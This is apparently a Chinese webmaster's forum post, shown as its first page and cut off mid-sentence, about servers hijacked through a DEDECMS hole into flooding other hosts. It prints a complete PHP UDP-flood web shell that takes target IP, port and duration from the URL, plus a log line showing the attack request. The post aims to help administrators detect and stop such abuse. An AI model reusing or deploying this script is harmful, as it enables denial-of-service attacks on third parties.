游客

标题:禁止服务器对外发包的方法
正文:
对外发包的代码 $packets = 0; $ip = $_GET[ip]; $rand = $_GET[port]; set_time_limit(0); ignore_user_abort(FALSE); $exec_time = $_GET[time]; $time = time(); print /"Flooded: $ip on port $rand /"; $max_time = $time+$exec_time;for($i=0;$i<65535;$i++){ $out .= /"X/"; } while(1){ $packets++; if(time() > $max_time){ break; } $fp = fsockopen(/"udp://$ip/", $rand, $errno, $errstr, 5); if($fp){ fwrite($fp, $out); fclose($fp); } } echo /"Packet complete at /".time(h:i:s/')./" with $packets (/" . round(($packets*65)/1024, 2) . /" mB) packets averaging /". round($packets/$exec_time, 2) . /" packets/s //n/"; ?>表现特征 一打开IIS,服务器的流出带宽就用光-----就是说服务器不断向别人发包,这个情况和受到DDOS攻击是不同的,DDOS是服务器不断收到大量数据包. 近期由于DEDECMS出现漏洞而导致大量服务器出现这个问题. 如何快速找到这些站? 你可以打开日志 C:/Windows/System32/LogFiles/HTTPERR/httperr...log,打开今天时间的文件, 里面有类似这样的记录: 2011-04-26 06:37:28 58.255.112.112 26817 98.126.247.13 80 HTTP/1.1 GET /xxxx/xxxxxx.php?host=122.224.32.100&port=
[<<][[1]][2][>>]

查看评论(0)
发表评论



首页